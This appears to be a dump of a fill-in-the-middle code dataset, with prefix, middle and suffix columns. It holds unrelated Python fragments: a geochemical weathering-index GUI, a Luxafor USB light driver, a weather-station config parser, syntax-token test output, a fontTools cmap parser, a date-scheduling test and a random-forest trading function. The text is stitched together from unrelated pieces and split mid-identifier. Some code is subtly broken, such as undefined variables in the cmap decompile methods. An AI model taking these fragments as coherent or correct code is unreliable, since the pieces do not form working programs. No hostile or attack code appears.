prefix
stringlengths
0
918k
middle
stringlengths
0
812k
suffix
stringlengths
0
962k
'Fe3O4': 231.531, 'BaO': 153.326, 'SrO': 103.619, 'Cr2O3': 151.98919999999998, } def __init__(self, parent=None, df=pd.DataFrame()): QMainWindow.__init__(self, parent) self.setWindowTitle('Chemical Index of Alteration & Index of Compositional Variability') self.items = [] self._df = df self._df.reindex() if (len(df) > 0): self._changed = True # print('DataFrame recieved to CIA') self.raw = df self.raw = self.CleanDataFile(df) self.rawitems = self.raw.columns.values.tolist() for i in self.rawitems: if i not in self.unuseful: self.items.append(i) else: pass self.create_main_frame() self.create_status_bar() def create_main_frame(self): self.resize(800,600) self.main_frame = QWidget() self.dpi = 128 self.setWindowTitle(
'Chemical Index of Alteration & Index of Compositional Variability') self.tableView = CustomQTableView(self.main_fr
ame) self.tableView.setObjectName('tableView') self.tableView.setSortingEnabled(True) self.textbox = GrowingTextEdit(self) self.textbox.setText(self.reference) # Other GUI controls self.save_button = QPushButton('&Save') self.save_button.clicked.connect(self.saveDataFile) # # Layout with box sizers # self.hbox = QHBoxLayout() for w in [self.save_button]: self.hbox.addWidget(w) self.hbox.setAlignment(w, Qt.AlignVCenter) self.vbox = QVBoxLayout() self.vbox.addWidget(self.tableView) #self.vbox.addWidget(self.tableView) self.vbox.addLayout(self.hbox) self.vbox.addWidget(self.textbox) self.main_frame.setLayout(self.vbox) self.setCentralWidget(self.main_frame) def Read(self, inpoints): points = [] for i in inpoints: points.append(i.split()) result = [] for i in points: for l in range(len(i)): a = float((i[l].split(','))[0]) a = a * self.x_scale b = float((i[l].split(','))[1]) b = (self.height_load - b) * self.y_scale result.append((a, b)) return (result) def CIA(self): self.WholeData = [] dataframe=pd.DataFrame() dataframe = self._df #dataframe.set_index('Label') ItemsAvalibale = dataframe.columns.values.tolist() Indexes = dataframe.index.values.tolist() #ItemsToCheck = ['Label','SiO2','Al2O3','Fe2O3','MgO','CaO','Na2O','K2O','P2O5','MnO','TiO2'] ItemsToTest = ['Number', 'Tag', 'Name', 'Author', 'DataType', 'Marker', 'Color', 'Size', 'Alpha', 'Style', 'Width'] for i in ItemsAvalibale: if 'O' not in i and i !='Label': dataframe = dataframe.drop(i, 1) WholeItemsAvalibale = dataframe.columns.values.tolist() ItemsAvalibale = dataframe.columns.values.tolist() Indexes = dataframe.index.values.tolist() if 'Whole' not in WholeItemsAvalibale: WholeItemsAvalibale.append('Whole') if 'CIA' not in WholeItemsAvalibale: WholeItemsAvalibale.append('CIA') if 'ICV' not in WholeItemsAvalibale: WholeItemsAvalibale.append('ICV') if 'PIA' not in WholeItemsAvalibale: WholeItemsAvalibale.append('PIA') if 'CIW' not in WholeItemsAvalibale: WholeItemsAvalibale.append('CIW') if 'CIW\'' not in 
WholeItemsAvalibale: WholeItemsAvalibale.append('CIW\'') print('index',Indexes,'\ncolums',WholeItemsAvalibale) WholeMole=[] WholeList=[] dataframe = dataframe.dropna(axis=1,how='all') print(dataframe) for j in Indexes: tmpList=[] tmpMoleSum=0 tmpcia=0 tmpAl2O3=0 tmpCaO=0 tmpNa2O=0 tmpK2O=0 tmpP2O5=0 tmpFe2O3=0 tmpMgO=0 tmpMnO=0 tmpTiO2=0 #ICV =(Fe2O3+K2O+Na2O+CaO*+MgO+MnO+TiO2)/Al2O3 (Cox,1995) for i in ItemsAvalibale: if i in self.BaseMass: m=dataframe.at[j,i] n=self.BaseMass[i] #print('\nm & n is \t',m,n) tmpmole= m/n #print(tmpmole) tmpMoleSum = tmpMoleSum + tmpmole #tmpList.append(dataframe.at[i,j]) #print('\n total mole is',tmpMoleSum) for i in ItemsAvalibale: if i in self.BaseMass: tmpdata= 100*(dataframe.at[j,i]/self.BaseMass[i])/tmpMoleSum tmpList.append(tmpdata) #print(i, tmpdata) if i =='Al2O3': tmpAl2O3=tmpdata elif i =='CaO': tmpCaO=tmpdata elif i =='Na2O': tmpNa2O = tmpdata elif i =='K2O': tmpK2O=tmpdata elif i =='P2O5': tmpP2O5=tmpdata elif i =='Fe2O3': tmpFe2O3=tmpdata elif i == 'MgO': tmpMgO = tmpdata elif i == 'MnO': tmpMnO = tmpdata elif i == 'TiO2': tmpTiO2 = tmpdata elif i == 'Label' : tmpdata = dataframe.at[j,i] tmpList.append(tmpdata) elif i in WholeItemsAvalibale: del WholeItemsAvalibale[WholeItemsAvalibale.index(i)] tmpList.append(tmpMoleSum) usedCaO=0 middleCaO= tmpCaO-(10/3.0*tmpP2O5) if middleCaO< tmpNa2O: usedCaO=middleCaO else: usedCaO=tmpNa2O #print(tmpAl2O3, usedCaO, tmpK2O, tmpNa2O) CIA=tmpAl2O3/(tmpAl2O3+usedCaO+tmpNa2O+tmpK2O)*100 tmpList.append(CIA) ICV =(tmpFe2O3+tmpK2O+tmpNa2O+usedCaO+tmpMgO+tmpMnO+tmpTiO2)/tmpAl2O3 #(Cox,1995) tmpList.append(ICV) PIA = ((tmpAl2O3-tmpK2O)/(tmpAl2O3-tmpK2O+usedCaO+tmpNa2O))*100 tmpList.append(PIA) CIW = (tmpAl2O3/(tmpAl2O3+usedCaO+tmpNa2O))*100 tmpList.append(CIW) CIW2 = (tmpAl2O3/(tmpAl2O3+tmpNa2O))*100 tmpList.append(CIW2) ''' CIA = [Al2O3/(Al2O3+CaO*+Na2O+K2O]×100 ICV = (Fe2O3+K2O+Na2O+CaO*+MgO+MnO+TiO2)/Al2O3 (Cox,1995) PIA = {(Al2O3-K2O)/[(Al2O3-K2O)+CaO*+Na2O]}×100 CIW = 
[Al2O3/(Al2O3+CaO*+Na2O)]×100 CIW' = [Al2O3/(Al2O3+Na2O)]×100 ''' #print(len(tmpList)) WholeList.append(tmpList) pass print(len(WholeList)) print(len(WholeItemsAvalibale)) df = pd.DataFrame(WholeList,columns=WholeItemsAvalibale) self.useddf = df self.tableView.setModel(PandasModel(self.useddf)) self.show() def saveDataFile(self): # if self.model._changed == True: # print('changed') # print(self.model._df) DataFileOutput, ok2 = QFileDialog.getSaveFileName(self, '文件保存', 'C:/', 'Excel Files (*.xlsx);;CSV Files (*.csv)') # 数据文件保存输出 if (DataFileOutput != ''): if ('csv' in DataFileOutput): self.useddf.to_csv(DataFileOutput, sep=',', encoding='utf-8') elif ('xls' in DataFileOutput): self.useddf.to_excel(D
# -*- coding: utf-8 -*- import usb class LuxaforFlag(object): DEVICE_VENDOR_ID = 0x04d8 DEVICE_PRODUCT_ID = 0xf372 MODE_STATIC_COLOUR = 1 MODE_FADE_COLOUR = 2 MODE_STROBE = 3 MODE_WAVE = 4 MODE_PATTERN = 6 LED_TAB_1 = 1 LED_TAB_2 = 2 LED_TAB_3 = 3 LED_BACK_1 = 4 LED_BACK_2 = 5 LED_BACK_3 = 6 LED_TAB_SIDE = 65 LED_BACK_SIDE = 66 LED_ALL = 255 WAVE_SINGLE_SMALL = 1 WAVE_SINGLE_LARGE = 2 WAVE_DOUBLE_SMALL = 3 WAVE_DOUBLE_LARGE = 4 PATTERN_LUXAFOR = 1 PATTERN_RANDOM1 = 2 PATTERN_RANDOM2 = 3 PATTERN_RANDOM3 = 4 PATTERN_POLICE = 5 PATTERN_RANDOM4 = 6 PATTERN_RANDOM5 = 7 PATTERN_RAINBOWWAVE = 8 def __init__(self): self.device = None def get_device(self): """ Retrieve a PyUSB device for the Luxafor Flag. Will lazy load the device as necessary. """ if not self.device: self.device = self.find_device() self.setup_device(self.device) return self.device def setup_device(self, device): """ Performs initialisation on the device. """ try: # Gets around "Resource busy" errors device.detach_kernel_driver(0) except Exception as e: pass device.set_configuration() def find_device(self): """ Attempts to retrieve the Luxafor Flag device using the known Vendor and Product IDs. """ device = usb.core.find( idVendor=LuxaforFlag.DEVICE_VENDOR_ID, idProduct=LuxaforFlag.DEVICE_PRODUCT_ID ) return device def write(self, values): """ Send values to the device. Expects the values to be a List of command byte codes. Refer to the individual commands for more information on the specific command codes. """ self.get_device().write(1, values) # Sometimes the flag simply ignores the command. Unknown if this # is an issue with PyUSB or the flag itself. But sending the # command again works a treat. 
self.get_device().write(1, values) def create_static_colour_command(self, led, r, g, b): return [LuxaforFlag.MODE_STATIC_COLOUR, led, r, g, b] def create_fade_colour_command(self, led, r, g, b, duration=20): return [LuxaforFlag.MODE_FADE_COLOUR, led, r, g, b, duration] def create_strobe_command(self, led, r, g, b, duration=20, repeat=2): return [LuxaforFlag.MODE_STROBE, led, r, g, b, duration, 0, repeat] def create_wave_command(self, wave_type, r, g, b, duration=20, repeat=1): return [ LuxaforFlag.MODE_WAVE, wave_type, r, g, b, duration, 0, repeat ] def create_pattern_command(self, pattern_id, repeat=1): return [LuxaforFlag.MODE_PATTERN, pattern_id, repeat] def off(self): """ Turn off all LEDs. """ self.do_static_colour(255, 0, 0, 0) def do_static_colour(self, leds, r, g, b): """ Set a single LED or multiple LEDs immediately to the specified colour. """ self._do_multi_led_command( self.create_static_colour_command, leds, r, g, b ) def do_fade_colour(self, leds, r, g, b, duration): """ Fade a single LED or multiple LEDs from their current colour to a new colour for the supplied duration. """ self._do_multi_led_command( self.create_fade_colour_command, leds, r, g, b, duration ) def do_strobe(self, led, r, g, b, duration, repeat): """ Flash the specified LED a specific colour, giving the duration of each flash and the number of times to repeat. Unfortunately this command does not sup
port multiple specific LEDs. """ command = self.create_strobe_command(led, r, g, b, duration, repeat) self.write(command) def do_wave(self, wave_type, r, g, b, duration, repeat
): """ Animate the flag with a wave pattern of the given type, using the specified colour, duration and number of times to repeat. """ command = self.create_wave_command( wave_type, r, g, b, duration, repeat ) self.write(command) def do_pattern(self, pattern, repeat): """ Execute a built in pattern a given number of times. """ command = self.create_pattern_command(pattern, repeat) self.write(command) def _do_multi_led_command( self, create_command_function, leds, *args, **kwargs ): try: iter(leds) except TypeError: command = create_command_function(leds, *args, **kwargs) self.write(command) else: for led in leds: command = create_command_function(led, *args, **kwargs) self.write(command)
0]*1024 #self._ = self.write(t); #print "CWeatherStationConfig._CheckSumm (should be retrieved) --> 0x%x" % self._CheckSumm def read(self,buf,start): self.logger.debug("wsconfig") nbuf=[0] nbuf[0]=buf[0] #print "read",nbuf[0] CheckSumm = nbuf[0][43+start] | (nbuf[0][42+start] << 8); self._CheckSumm = CheckSumm; CheckSumm -= 7; self._ClockMode = nbuf[0][0+start] & 1; self._TemperatureFormat = (nbuf[0][0+start] >> 1) & 1; self._PressureFormat = (nbuf[0][0+start] >> 2) & 1; self._RainFormat = (nbuf[0][0+start] >> 3) & 1; self._WindspeedFormat = (nbuf[0][0+start] >> 4) & 0xF; self._WeatherThreshold = nbuf[0][1+start] & 0xF; self._StormThreshold = (nbuf[0][1+start] >> 4) & 0xF; self._LCDContrast = nbuf[0][2+start] & 0xF; self._LowBatFlags = (nbuf[0][2+start] >> 4) & 0xF; USBHardware.ReverseByteOrder(nbuf,3+start, 4) #buf=nbuf[0] #CWeatherStationConfig::readAlertFlags(thisa, buf + 3+start); USBHardware.ReverseByteOrder(nbuf, 7+start, 5); #v2 = USBHardware.ToTemperature(nbuf, 7+start, 1); #CWeatherStationHighLowAlarm::SetLowAlarm(&self._AlarmTempIndoor, v2); #v3 = USBHardware.ToTemperature(nbuf + 9+start, 0); #self._AlarmTempIndoor.baseclass_0.baseclass_0.vfptr[2].__vecDelDtor( # (CWeatherStationAlarm *)&self._AlarmTempIndoor, # LODWORD(v3)); #j___RTC_CheckEsp(v4); USBHardware.ReverseByteOrder(nbuf, 12+start, 5); #v5 = USBHardware.ToTemperature(nbuf, 12+start, 1); #CWeatherStationHighLowAlarm::SetLowAlarm(&self._AlarmTempOutdoor, v5); #v6 = USBHardware.ToTemperature(nbuf, 14+start, 0); #self._AlarmTempOutdoor.baseclass_0.baseclass_0.vfptr[2].__vecDelDtor( # (CWeatherStationAlarm *)&self._AlarmTempOutdoor, # LODWORD(v6)); USBHardware.ReverseByteOrder(nbuf, 17+start, 2); #v8 = USBHardware.ToHumidity(nbuf, 17+start, 1); #CWeatherStationHighLowAlarm::SetLowAlarm(&self._AlarmHumidityIndoor, v8); #v9 = USBHardware.ToHumidity(nbuf, 18+start, 1); #self._AlarmHumidityIndoor.baseclass_0.baseclass_0.vfptr[2].__vecDelDtor( # (CWeatherStationAlarm *)&self._AlarmHumidityIndoor, # 
LODWORD(v9)); USBHardware.ReverseByteOrder(nbuf, 19+start, 2); #v11 = USBHardware.ToHumidity(nbuf, 19+start, 1); #CWeatherStationHighLowAlarm::SetLowAlarm(&self._AlarmHumidityOutdoor, v11); #v12 = USBHardware.ToHumidity(nbuf, 20+start, 1); #self._AlarmHumidityOutdoor.baseclass_0.baseclass_0.vfptr[2].__vecDelDtor( # (CWeatherStationAlarm *)&self._AlarmHumidityOutdoor, # LODWORD(v12)); USBHardware.ReverseByteOrder(nbuf, 21+start, 4); #v14 = USBHardware.To4Pre3Post(nbuf, 21+start); #self._AlarmRain24H.baseclass_0.vfptr[2].__vecDelDtor((CWeatherStationAlarm *)&self._AlarmRain24H, LODWORD(v14)); self._HistoryInterval = nbuf[0][25+start] & 0xF; #USBHardware.ReverseByteOrder(nbuf, 26+start, 3u); ##v16 = USBHardware._ToWindspeed(nbuf, 26+start); #CWeatherStationWindAlarm::SetHighAlarmRaw(&self._AlarmGust, v16); #USBHardware.ReverseByteOrder(nbuf, 29+start, 5u); #USBHardware.ReadPressureShared(nbuf, 29+start, &a, &b); #v17 = Conversions::ToInhg(a); #v25 = b - v17; #if ( fabs(v25) > 1.0 ) #{ # Conversions::ToInhg(a); # v18 = CTracer::Instance(); # CTracer::WriteTrace(v18, 30, "low pressure alarm difference: %f"); #} #CWeatherStationHighLowAlarm::SetLowAlarm(&self._AlarmPressure, a); USBHardware.ReverseByteOrder(nbuf, 34+start, 5); #USBHardware.ReadPressureShared(nbuf, 34+start, &a, &b); #v19 = Conversions::ToInhg(a); #v25 = b - v19; #if ( fabs(v25) > 1.0 ) #{ # Conversions::ToInhg(a); # v20 = CTracer::Instance(); # CTracer::WriteTrace(v20, 30, "high pressure alarm difference: %f"); #} #self._AlarmPressure.baseclass_0.baseclass_0.vfptr[2].__vecDelDtor( # (CWeatherStationAlarm *)&self._AlarmPressure, # LODWORD(a)); t = nbuf[0][39+start]; t <<= 8; t |= nbuf[0][40+start]; t <<= 8; t |= nbuf[0][41+start]; #std::bitset<23>::bitset<23>((std::bitset<23> *)&v26, t); #self._ResetMinMaxFlags._Array[0] = v22; #for ( i = 0; i < 0x27; ++i ) for i in xrange(0, 38): CheckSumm -= nbuf[0][i+start]; #if ( CheckSumm ): for now is better to comment it #self._CheckSumm = -1; filename= 
"/etc/WV5Datastore.cfg" config = ConfigObj(filename) config.filename = filename config['ws28xx'] = {} config['ws28xx']['CheckSumm'] = str(self._CheckSumm) config['ws28xx']['ClockMode'] = str(self._ClockMode) config['ws28xx']['TemperatureFormat'] = str(self._TemperatureFormat) config['ws28xx']['PressureFormat'] = str(self._PressureFormat) config['ws28xx']['RainFormat'] = str(self._RainFormat) config['ws28xx']['WindspeedFormat'] = str(self._WindspeedFormat) config['ws28xx']['WeatherThreshold'] = str(self._WeatherThreshold) config['ws28xx']['StormThreshold'] = str(self._StormThreshold) config['ws28xx']['LCDContrast'] = str(self._LCDContrast) config['ws28xx']['LowBatFlags'] = str(self._LowBatFlags) config['ws28xx']['HistoryInterval'] = str(self._HistoryInterval) config.write() return 1; def write(self,buf): self.logger.debug("") new_buf = [0] new_buf[0]=buf[0] CheckSumm = 7; new_buf[0][0] = 16 * (self._WindspeedFormat & 0xF) + 8 * (self._RainFormat & 1) + 4 * (self._PressureFormat & 1) + 2 * (self._TemperatureFormat & 1) + self._ClockMode & 1; new_buf[0][1] = self._WeatherThreshold & 0xF | 16 * self._StormThreshold & 0xF0; new_buf[0][2] = self._LCDContrast & 0xF | 16 * self._LowBatFlags & 0xF0; #CWeatherStationConfig::writeAlertFlags(nbuf, 3); #((void (__thiscall *)(CWeatherStationHighLowAlarm *))thisa->_AlarmTempIndoor.baseclass_0.baseclass_0.vfptr[1].__vecDelDtor)(&thisa->_
AlarmTempIndoor); #v25 = v2; #v24 = CWeatherTraits.TemperatureOffset() + v2; #v21 = v24; #v22 = CWeatherTraits.TemperatureOffset() + CWeatherStationHighLowAlarm::GetLow
Alarm(&thisa->_AlarmTempIndoor); #v4 = v22; #USBHardware::ToTempAlarmBytes(nbuf, 7, v22, v21); #((void (__thiscall *)(CWeatherStationHighLowAlarm *))thisa->_AlarmTempOutdoor.baseclass_0.baseclass_0.vfptr[1].__vecDelDtor)(&thisa->_AlarmTempOutdoor); #v25 = v4; #v24 = CWeatherTraits.TemperatureOffset() + v4; #v21 = v24; #v22 = CWeatherTraits.TemperatureOffset() + CWeatherStationHighLowAlarm::GetLowAlarm(&thisa->_AlarmTempOutdoor); #v6 = v22; #USBHardware::ToTempAlarmBytes(nbuf, 12, v22, v21); #((void (__thiscall *)(CWeatherStationHighLowAlarm *))thisa->_AlarmHumidityIndoor.baseclass_0.baseclass_0.vfptr[1].__vecDelDtor)(&thisa->_AlarmHumidityIndoor); #v21 = v6; #v8 = CWeatherStationHighLowAlarm::GetLowAlarm(&thisa->_AlarmHumidityIndoor); #v9 = v8; #USBHardware::ToHumidityAlarmBytes(nbuf, 17, v9, v21); #((void (__thiscall *)(CWeatherStationHighLowAlarm *))thisa->_AlarmHumidityOutdoor.baseclass_0.baseclass_0.vfptr[1].__vecDelDtor)(&thisa->_AlarmHumidityOutdoor); #v21 = v8; #v11 = CWeatherStationHighLowAlarm::GetLowAlarm(&thisa->_AlarmHumidityOutdoor); #v12 = v11; #USBHardware::ToHumidityAlarmBytes(nbuf, 19, v12, v21); #((void (__thiscall *)(CWeatherStationHighAlarm *))thisa->_AlarmRain24H.baseclass_0.vfptr[1].__vecDelDtor)(&thisa->_AlarmRain24H); #v21 = v11; #USBHardware::ToRainAlarmBytes(nbuf, 21, v21); new_buf[0][25] = self._HistoryInterval & 0xF; #v21 = CWeatherStationWindAlarm::GetHighAlarmRaw(&thisa->_AlarmGust); #USBHardware::_ToWindspeedAlarmBytes(nbuf, 26, v21); #v21 = CWeatherStationHighLowAlarm::GetLowAlarm(&thisa->_AlarmPressure); #v21 = Conversions::ToInhg(v21); #v14 = CWeatherStationHighLowAlarm::GetLowAlarm(&thisa->_AlarmPressure); #v15 = CWeatherStationHighLowAlarm::GetLowAlarm(&thisa->_AlarmPressure); #USBHardware::ToPressureBytesShared(nbuf, 29, v15, v21); #((void (__thiscall *)(CWeatherStationHighLowAlarm *))thisa->_AlarmPressure.baseclass_0.baseclass_0.vfptr[1].__vecDelDtor)(&thisa->_AlarmPressure); #((void (__thiscall *)(CWeatherStationHighLowAlarm 
*))thisa->_AlarmPressure.baseclass_0.baseclass_0.vfptr[1].__vecDelDtor)(&thisa->_AlarmPressure); #USBHardware::ToPressureBytesShared(nbuf, 34, Conversions::ToInhg(CWeatherStationHighLowAlarm::GetLowAlarm(&thisa->_AlarmPressure)), Conversions::ToInhg(CWeatherStationHighLowAlarm::GetLowAlarm(&thisa->
from....import a from...import b from..import c from.import d
from : keyword.control.import.python, source.python .... : punctuation.separator.period.python, source.python import : keyword.control.import.python, source.python : source.python a : source.python from : keyword.control.import.python, source.python ...
: punctuation.separator.period.python, source.python import : keyword.control.import.python, source.python : source.python b : source.python from : keyword.control.import.python, source.python .. : punctuation.separator.period.python, source.python import : keyword.control.import.python, source.python : source.python c : source.python from : keyword.control.import.python, source.python . : punctuation.separator.period.python, source.python import : keyword.control.import.python, source.python : source.python d : source.python
der(self, data, ttFont): format, length, language = struct.unpack(">HHH", data[:6]) assert len(data) == length, "corrupt cmap table format %d (data length: %d, header length: %d)" % (format, len(data), length) self.format = int(format) self.length = int(length) self.language = int(language) self.data = data[6:] self.ttFont = ttFont def toXML(self, writer, ttFont): writer.begintag(self.__class__.__name__, [ ("platformID", self.platformID), ("platEncID", self.platEncID), ("language", self.language), ]) writer.newline() codes = sorted(self.cmap.items()) self._writeCodes(codes, writer) writer.endtag(self.__class__.__name__) writer.newline() def isUnicode(self): return (self.platformID == 0 or (self.platformID == 3 and self.platEncID in [1, 10])) def isSymbol(self): return self.platformID == 3 and self.platEncID == 0 def _writeCodes(self, codes, writer): isUnicode = self.isUnicode() for code, name in codes: writer.simpletag("map", code=hex(code), name=name) if isUnicode: writer.comment(Unicode[code]) writer.newline() def __lt__(self, other): if not isinstance(other, CmapSubtable): return NotImplemented # implemented so that list.sort() sorts according to the spec. selfTuple = ( getattr(self, "platformID", None), getattr(self, "platEncID", None), getattr(self, "language", None), self.__dict__) otherTuple = ( getattr(other, "platformID", None), getattr(other, "platEncID", None), getattr(other, "language", None), other.__dict__) return selfTuple < otherTuple class cmap_format_0(CmapSubtable):
def decompile(self, data, ttFont): # we usually get here indirectly from the subtable __getattr__ function, in which case both args must be None. # If not, someone is calling the subtable decompile() directly, and must provide both args. if data is not None and ttFont is not None: self.decompileHeader(data[offset:offset+int(length)], ttFont) else: assert (data
is None and ttFont is None), "Need both data and ttFont arguments" data = self.data # decompileHeader assigns the data after the header to self.data assert 262 == self.length, "Format 0 cmap subtable not 262 bytes" glyphIdArray = array.array("B") glyphIdArray.fromstring(self.data) self.cmap = cmap = {} lenArray = len(glyphIdArray) charCodes = list(range(lenArray)) names = map(self.ttFont.getGlyphName, glyphIdArray) list(map(operator.setitem, [cmap]*lenArray, charCodes, names)) def compile(self, ttFont): if self.data: return struct.pack(">HHH", 0, 262, self.language) + self.data charCodeList = sorted(self.cmap.items()) charCodes = [entry[0] for entry in charCodeList] valueList = [entry[1] for entry in charCodeList] assert charCodes == list(range(256)) valueList = map(ttFont.getGlyphID, valueList) glyphIdArray = array.array("B", valueList) data = struct.pack(">HHH", 0, 262, self.language) + glyphIdArray.tostring() assert len(data) == 262 return data def fromXML(self, name, attrs, content, ttFont): self.language = safeEval(attrs["language"]) if not hasattr(self, "cmap"): self.cmap = {} cmap = self.cmap for element in content: if not isinstance(element, tuple): continue name, attrs, content = element if name != "map": continue cmap[safeEval(attrs["code"])] = attrs["name"] subHeaderFormat = ">HHhH" class SubHeader(object): def __init__(self): self.firstCode = None self.entryCount = None self.idDelta = None self.idRangeOffset = None self.glyphIndexArray = [] class cmap_format_2(CmapSubtable): def setIDDelta(self, subHeader): subHeader.idDelta = 0 # find the minGI which is not zero. minGI = subHeader.glyphIndexArray[0] for gid in subHeader.glyphIndexArray: if (gid != 0) and (gid < minGI): minGI = gid # The lowest gid in glyphIndexArray, after subtracting idDelta, must be 1. # idDelta is a short, and must be between -32K and 32K. minGI can be between 1 and 64K. 
# We would like to pick an idDelta such that the first glyphArray GID is 1, # so that we are more likely to be able to combine glypharray GID subranges. # This means that we have a problem when minGI is > 32K # Since the final gi is reconstructed from the glyphArray GID by: # (short)finalGID = (gid + idDelta) % 0x10000), # we can get from a glypharray GID of 1 to a final GID of 65K by subtracting 2, and casting the # negative number to an unsigned short. if (minGI > 1): if minGI > 0x7FFF: subHeader.idDelta = -(0x10000 - minGI) -1 else: subHeader.idDelta = minGI -1 idDelta = subHeader.idDelta for i in range(subHeader.entryCount): gid = subHeader.glyphIndexArray[i] if gid > 0: subHeader.glyphIndexArray[i] = gid - idDelta def decompile(self, data, ttFont): # we usually get here indirectly from the subtable __getattr__ function, in which case both args must be None. # If not, someone is calling the subtable decompile() directly, and must provide both args. if data is not None and ttFont is not None: self.decompileHeader(data[offset:offset+int(length)], ttFont) else: assert (data is None and ttFont is None), "Need both data and ttFont arguments" data = self.data # decompileHeader assigns the data after the header to self.data subHeaderKeys = [] maxSubHeaderindex = 0 # get the key array, and determine the number of subHeaders. 
allKeys = array.array("H") allKeys.fromstring(data[:512]) data = data[512:] if sys.byteorder != "big": allKeys.byteswap() subHeaderKeys = [ key//8 for key in allKeys] maxSubHeaderindex = max(subHeaderKeys) #Load subHeaders subHeaderList = [] pos = 0 for i in range(maxSubHeaderindex + 1): subHeader = SubHeader() (subHeader.firstCode, subHeader.entryCount, subHeader.idDelta, \ subHeader.idRangeOffset) = struct.unpack(subHeaderFormat, data[pos:pos + 8]) pos += 8 giDataPos = pos + subHeader.idRangeOffset-2 giList = array.array("H") giList.fromstring(data[giDataPos:giDataPos + subHeader.entryCount*2]) if sys.byteorder != "big": giList.byteswap() subHeader.glyphIndexArray = giList subHeaderList.append(subHeader) # How this gets processed. # Charcodes may be one or two bytes. # The first byte of a charcode is mapped through the subHeaderKeys, to select # a subHeader. For any subheader but 0, the next byte is then mapped through the # selected subheader. If subheader Index 0 is selected, then the byte itself is # mapped through the subheader, and there is no second byte. # Then assume that the subsequent byte is the first byte of the next charcode,and repeat. # # Each subheader references a range in the glyphIndexArray whose length is entryCount. # The range in glyphIndexArray referenced by a sunheader may overlap with the range in glyphIndexArray # referenced by another subheader. # The only subheader that will be referenced by more than one first-byte value is the subheader # that maps the entire range of glyphID values to glyphIndex 0, e.g notdef: # {firstChar 0, EntryCount 0,idDelta 0,idRangeOffset xx} # A byte being mapped though a subheader is treated as in index into a mapping of array index to font glyphIndex. # A subheader specifies a subrange within (0...256) by the # firstChar and EntryCount values. If the byte value is outside the subrange, then the glyphIndex is zero # (e.g. glyph not in font). 
# If the byte index is in the subrange, then an offset index is calculated as (byteIndex - firstChar). # The index to glyphIndex mapping is a subrange of the glyphIndexArray. You find the start of the subrange by # counting idRangeOffset bytes from the idRangeOffset word. The first value in this subrange is the # glyphIndex for the index firstChar. The offset index should then be used in this array to get the glyphIndex. # Example for Logocut-Medium # first byte of charcode = 129; selects subheader 1. # subheader 1 = {firstChar 64, EntryCount 108,idDelta 42,idRangeOffset 0252} # second byte of charCode = 66 # the index offset = 66-64 = 2. # The subrange of the glyphIndexAr
#!/usr/bin/env python # -*- coding: utf-8 -*- # Datetools provide a method of manipulating and working dates and times. # Copyright (C) 2013-2018 Chris Caron <lead2gold@gmail.com> # # This file is part of Datetools. Datetools is free software; you can # redistribute it and/or modify it under the terms of the GNU General Public # License as published by the Free Software Foundation; either version 2 of # the License, or (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License along with # this program; if not, write to the Free Software Foundation, Inc., # 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. """ This is just a simple tool for testing that the output is as expected """ from datetime import datetime from dateblock import dateblock from datetime import date from datetime import time # Support python datetime object print dateblock("*/1
", ref=datetime(2000, 5, 3, 10, 10, 0)) # Support python date object print dateblock("*/1", ref=date(2000, 5, 3)) # Support python time object print dateblock("*/1", ref=time(20, 5, 3), block=False) # Time equals 'now' print dateblock("*/1", ref=None, block=False) # Epoch Time print dateblock("*/1", ref=7999434323, block=False) # Drift Time print dateblock("*/10 +5", ref=7999434323, block=False) # Blocking should never be possible if the tim
e is in the past print dateblock("*/10 +7", ref=999434323, block=True) # Drifting inline print dateblock("*/10 +5", ref=date(2000, 1, 1), block=False) # Drifting inline (with option specified, inline should over-ride) # Drifting without use of + print dateblock("*/10 * * * * * 5", ref=date(2000, 2, 1), block=False) # Drifting with multiple options specified print dateblock("* 10 +5,8", ref=date(2000, 3, 1), block=False)
import pandas as pd
import numpy as np
from random import sample
from sklearn.ensemble import RandomForestClassifier


def ML_BuySell(all_data, predictDate, predictors, previous_results,
               limit=0.0051, limit_comp=np.arange(-.015, 0.02, 0.001),
               days_previous=252, train_split=0.8, n=3, acc_limit=0.75):
    """
    Use random-forest models over previous trades to predict what is going
    to happen on the query date.

    :param all_data: pandas DataFrame, all technical details, generated from
        the Predictors class
    :param predictDate: pandas DateTime, the timestamp you want to look at
    :param predictors: array containing the names of the technical indicators used
    :param previous_results: pandas DataFrame containing the daily percentage change
    :param limit: float, the minimum estimated change for which trades can occur
    :param limit_comp: numpy array, a list of percentage thresholds to check
    :param days_previous: int, how many previous days should be simulated
    :param train_split: float, training/testing split between (0, 1)
    :param n: int, number of trees per random forest
    :param acc_limit: float, minimum accuracy for a trade to take place
        (currently unused; kept for interface compatibility)
    :return: pandas DataFrame containing Buy and Sell commands, or None when
        there is not enough history, the date is absent, or the estimated
        change does not clear ``limit``.
    """
    # History strictly before the prediction date.
    # FIX: the original used DataFrame.ix, which was deprecated in pandas
    # 0.20 and removed in 1.0; .loc (label/boolean) and .iloc (positional)
    # are the supported equivalents.
    ALLX_DATA = all_data.loc[all_data.index < predictDate, predictors]
    if len(ALLX_DATA) < days_previous:
        return

    # Shift by -1 so each row is labelled with the *next* day's change,
    # then drop the final (now-NaN) row.
    ALLY_DATA = previous_results.loc[all_data.index <= predictDate].shift(-1)
    ALLY_DATA = ALLY_DATA.drop(ALLY_DATA.index[-1])

    fluc_m = []
    # Restrict to the most recent look-back window.
    X_TEST_B = ALLX_DATA[(-1 * days_previous):]
    Y_TEST_B = ALLY_DATA[(-1 * days_previous):]

    # Get parameters for the day in question.
    PREDICT_X = all_data.loc[all_data.index == predictDate, predictors]
    if PREDICT_X.empty:
        return

    pred_v = []
    acc = []
    for x in np.nditer(limit_comp):
        # Random positional train/test split within the window.
        indices = sample(range(days_previous),
                         int(np.round(days_previous * train_split)))
        X_TRAIN = X_TEST_B.iloc[indices]
        Y_TRAIN = Y_TEST_B.iloc[indices]
        X_TEST = X_TEST_B.drop(X_TEST_B.index[indices])
        Y_TEST = Y_TEST_B.drop(Y_TEST_B.index[indices])

        # Fit a classifier for "next-day change exceeds threshold x".
        fluc_m.append(RandomForestClassifier(n_estimators=n))
        fluc_m[-1].fit(X_TRAIN, 1 * (Y_TRAIN > x))

        # Hold-out accuracy for this threshold.
        a = fluc_m[-1].score(X_TEST, 1 * (Y_TEST > x))
        acc.append(a)

        # Prediction for the query date.
